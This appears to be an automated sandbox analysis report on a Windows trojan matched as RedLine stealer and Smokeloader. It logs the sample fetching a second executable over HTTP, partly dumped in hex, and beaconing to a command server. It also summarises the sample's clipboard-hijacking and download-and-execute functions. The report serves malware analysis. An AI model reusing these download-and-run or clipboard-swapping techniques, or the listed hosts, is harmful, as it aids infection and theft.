Dec 18, 2024 20:55:41.803612947 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.803658962 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.805202961 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.805262089 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.805758953 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.805851936 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.806759119 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.806817055 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.807162046 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.807212114 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.808852911 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.808866978 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.808916092 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.809952021 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.809967041 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.810012102 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.811885118 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.811899900 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.811947107 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.813122988 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.813137054 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.813179970 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.816015959 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.816030025 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.816082001 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.817516088 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.817569971 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.818200111 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.818252087 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.819653034 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.819667101 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.819708109 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.821089029 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.821108103 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.821140051 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.821162939 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.822571993 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.822640896 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.823285103 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.823332071 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.824749947 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.824765921 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.824810982 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.825529099 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.825581074 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.826253891 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.826302052 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.827675104 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.827727079 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:45.111607075 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:45.111649036 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:45.111720085 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:45.113050938 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:45.113066912 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:46.102762938 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:46.102899075 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:46.337301970 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:46.337579012 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:46.402962923 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:46.402988911 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:46.403445959 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:46.454050064 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:46.795124054 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:46.795284033 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:46.795331001 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:47.533736944 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:47.533807039 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:47.533885002 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:47.546171904 CET	49712	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:47.546185017 CET	443	49712	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:47.557703018 CET	49715	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:47.557735920 CET	443	49715	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:47.557811022 CET	49715	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:47.558098078 CET	49715	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:55:47.558109999 CET	443	49715	172.67.220.223	192.168.2.12
Dec 18, 2024 20:55:48.594984055 CET	49715	443	192.168.2.12	172.67.220.223
Dec 18, 2024 20:57:26.641752958 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:57:26.953921080 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:57:27.567970037 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:57:28.782058954 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:57:31.219505072 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:57:36.099258900 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:57:45.828860044 CET	49711	80	192.168.2.12	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 20:55:36.654336929 CET	53008	53	192.168.2.12	1.1.1.1
Dec 18, 2024 20:55:36.919024944 CET	53	53008	1.1.1.1	192.168.2.12
Dec 18, 2024 20:55:44.631941080 CET	51216	53	192.168.2.12	1.1.1.1
Dec 18, 2024 20:55:45.104413986 CET	53	51216	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 20:55:36.654336929 CET	192.168.2.12	1.1.1.1	0x8d42	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:55:44.631941080 CET	192.168.2.12	1.1.1.1	0x7bba	Standard query (0)	rapeflowwj.lat	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 20:55:36.919024944 CET	1.1.1.1	192.168.2.12	0x8d42	No error (0)	post-to-me.com	172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:55:36.919024944 CET	1.1.1.1	192.168.2.12	0x8d42	No error (0)	post-to-me.com	104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:55:45.104413986 CET	1.1.1.1	192.168.2.12	0x7bba	No error (0)	rapeflowwj.lat	172.67.220.223	A (IP address)	IN (0x0001)	false
Dec 18, 2024 20:55:45.104413986 CET	1.1.1.1	192.168.2.12	0x7bba	No error (0)	rapeflowwj.lat	104.21.24.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

rapeflowwj.lat

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49711	176.113.115.19	80	7096	C:\Users\user\Desktop\sqJIHyPqhr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 20:55:39.423887014 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 18, 2024 20:55:40.836658955 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 19:55:40 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 18 Dec 2024 19:45:02 GMT ETag: "59e00-62990a64a108c" Accept-Ranges: bytes Content-Length: 368128 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wBA3#3#3#lK2#-qY-#-qH'#-q^]#6#3#@#-qW2#-qI2#-qL2#Rich3#PELXg_e*?@0C(<B.text `.rdata!"@@.data=@p@.rsrcB@@
Dec 18, 2024 20:55:40.836782932 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 64 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 f9 09 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 Data Ascii: %dD;@DuUQeVEPuupu9EttM^jh$Deu;5w"jYeVYEEEjYUVuSW=D=oDuc
Dec 18, 2024 20:55:40.836796999 CET	1236	IN	Data Raw: 7e 8a 0b 88 4f 01 83 b8 ac 00 00 00 01 7e 32 33 c9 85 f6 0f 95 c1 51 56 6a 02 57 6a 09 ff 70 04 ff 15 a0 10 44 00 85 c0 74 17 83 27 00 8b 45 08 85 c0 74 b2 8b 4d f0 8b 89 ac 00 00 00 89 08 eb a5 83 27 00 e8 61 06 00 00 c7 00 2a 00 00 00 85 f6 74 Data Ascii: ~O~23QVjWjpDt'EtM'a*t3fEtC}MapEPPQ3YYtZM9EsE7,~3RVPSjqDP{FU3
Dec 18, 2024 20:55:40.837544918 CET	1236	IN	Data Raw: c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 f7 b7 03 00 89 45 e0 39 75 e4 75 06 50 e8 45 14 00 00 e8 6c 14 00 00 89 7d fc eb 35 8b 45 ec 8b 08 8b 09 89 4d dc 50 51 e8 b2 35 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 Data Ascii: tMjYQPVh@E9uuPEl}5EMPQ5YYeEE}uP(HEE3@eEr;xU(lDlDlDlD5lD=lDf0lDf$lDflDfkDf%kDf-kD(lDEl
Dec 18, 2024 20:55:40.837553978 CET	1236	IN	Data Raw: 59 85 c0 75 08 6a 11 e8 1c 0d 00 00 59 ff 36 ff 15 c8 10 44 00 5e 5d c3 8b ff 55 8b ec 8b 0d 80 b4 81 00 a1 84 b4 81 00 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d Data Ascii: YujY6D^]UkU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y
Dec 18, 2024 20:55:40.838329077 CET	1236	IN	Data Raw: 08 8d 4a 0c 89 48 08 89 41 04 83 64 9e 44 00 33 ff 47 89 bc 9e c4 00 00 00 8a 46 43 8a c8 fe c1 84 c0 8b 45 08 88 4e 43 75 03 09 78 04 ba 00 00 00 80 8b cb d3 ea f7 d2 21 50 08 8b c3 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 0c 8b 4d 08 8b 41 10 53 56 Data Ascii: JHAdD3GFCENCux!P_^[UMASVuW}+QiDMOI;\|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML
Dec 18, 2024 20:55:40.838336945 CET	776	IN	Data Raw: 89 5d ec 23 5c 88 44 89 5c 88 44 fe 0f 75 33 8b 4d ec 8b 5d 08 21 0b eb 2c 8d 4f e0 d3 eb 8b 4d fc 8d 8c 88 c4 00 00 00 8d 7c 38 04 f7 d3 21 19 fe 0f 89 5d ec 75 0b 8b 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 Data Ascii: ]#\D\Du3M]!,OM\|8!]u]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M\|D)}uN{MN7MtLMu
Dec 18, 2024 20:55:40.839132071 CET	1236	IN	Data Raw: 0f 84 52 ff ff ff 68 04 40 44 00 57 8b cb e8 0d 31 00 00 e9 1c ff ff ff 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 d8 10 44 00 a3 8c 6f 44 00 85 c0 75 02 5d c3 33 c0 40 a3 78 b4 81 00 5d c3 8b ff 55 8b ec 57 bf e8 03 00 Data Ascii: Rh@DW1U39EjhPDoDu]3@x]UWWDu(D`wt_]Uu5BDDh]UhD(DthDPLDtu]UuYuDjJYjg
Dec 18, 2024 20:55:40.839138985 CET	792	IN	Data Raw: 56 56 56 e8 34 06 00 00 83 c4 14 68 10 20 01 00 68 68 17 44 00 57 e8 35 30 00 00 83 c4 0c eb 32 6a f4 ff 15 e8 10 44 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac 42 44 00 ff 36 e8 a1 32 00 00 59 50 ff 36 53 ff 15 e4 10 44 00 Data Ascii: VVV4h hhDW502jD;t$tjEP4BD62YP6SD_^[j}3Ytjp3Yu=@Duh)hYYUErD]U5rDVYtuYt3@]3]`CD`Vj^u;}`jPx
Dec 18, 2024 20:55:40.839144945 CET	1236	IN	Data Raw: df 02 00 00 59 83 f8 ff 74 2e 56 e8 d3 02 00 00 59 83 f8 fe 74 22 56 e8 c7 02 00 00 c1 f8 05 56 8d 3c 85 40 a3 81 00 e8 b7 02 00 00 83 e0 1f 59 c1 e0 06 03 07 59 eb 05 b8 e0 45 44 00 8a 40 04 24 82 3c 82 75 07 81 4e 0c 00 20 00 00 81 7e 18 00 02 Data Ascii: Yt.VYt"VV<@YYED@$<uN ~uFtuFNAF~_^]jTh%D3}EPDDEj@j ^VYY;@5(0@@x@$@%@&
Dec 18, 2024 20:55:40.956451893 CET	1236	IN	Data Raw: 74 08 ff 75 08 ff d0 89 45 08 8b 45 08 5e 5d c3 6a 00 e8 87 ff ff ff 59 c3 8b ff 55 8b ec 56 ff 35 24 46 44 00 8b 35 f4 10 44 00 ff d6 85 c0 74 21 a1 20 46 44 00 83 f8 ff 74 17 50 ff 35 24 46 44 00 ff d6 ff d0 85 c0 74 08 8b 80 fc 01 00 00 eb 27 Data Ascii: tuEE^]jYUV5$FD5Dt! FDtP5$FDt'DV(DuV YthDPLDtuEE^]DV5$FDDu5rDeYV5$FDD^ FDtP5rD;Y FD$FDtP

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49710	172.67.179.207	443	7096	C:\Users\user\Desktop\sqJIHyPqhr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 19:55:38 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-18 19:55:39 UTC	805	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 19:55:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgndvjtUN1lU7AbdzdTb0utzy7F5WjrOCcwbsLd0LrZ0BCzebtzvLqdWcBGZdTzPulY5b2V7YV9%2FEL9PHgBlhDM3HKUNaL%2FEDsmNtc%2FBl19ocqJLNclm7JgZJW%2BC%2F1biFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41b62f883c0fa4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1708&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1688837&cwnd=176&unsent_bytes=0&cid=60b759d229a32525&ts=1038&x=0"
2024-12-18 19:55:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 19:55:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49712	172.67.220.223	443	6636	C:\Users\user\AppData\Local\Temp\E093.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 19:55:46 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: rapeflowwj.lat
2024-12-18 19:55:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 19:55:47 UTC	1039	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 19:55:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dts0ffuc0gtb8dvvim4i71asva; expires=Sun, 13-Apr-2025 13:42:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehaT64y4ymnghjRYnhw8JZ8DOQ%2FqdCHsoiPLm4nV0ixwG3eySM8cY8Le8kxWcb0fA5C3Bwnly%2BM%2BdOimo%2B6npgUVzxzSWmOQglQlrcamSh6CoMczEnJXnJ8v4XdW6ycmSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41b6627c5f41f9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1759&rtt_var=672&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=905&delivery_rate=1660034&cwnd=212&unsent_bytes=0&cid=bb83551e28777d5a&ts=1213&x=0"
2024-12-18 19:55:47 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 19:55:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:55:33
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\sqJIHyPqhr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\sqJIHyPqhr.exe"
Imagebase:	0x400000
File size:	437'248 bytes
MD5 hash:	FC0FF134AA4C7A6C02F3D502EB17A1D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:55:41
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\E093.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\E093.tmp.exe"
Imagebase:	0x400000
File size:	368'128 bytes
MD5 hash:	9026F04B1266851659FB62C91BD7F2F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:55:49
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656
Imagebase:	0xa70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	3.7%
Signature Coverage:	5.7%
Total number of Nodes:	759
Total number of Limit Nodes:	21

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

<, xrefs: 00402B45
.exe, xrefs: 00402A6B
ShareScreen, xrefs: 00402A12

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 009DA456 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009DA47E
Module32First.KERNEL32(00000000,00000224), ref: 009DA49E

Memory Dump Source

Source File: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d9000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6e97aa2a39c884eabba5665a86e8ad8b3e5ac12bd4a198524c95cb84e228de05
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5BF0F6351403106FD7203BF9988DB6EB6ECAF48335F10852AE642921D0CBB0EC158A62

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

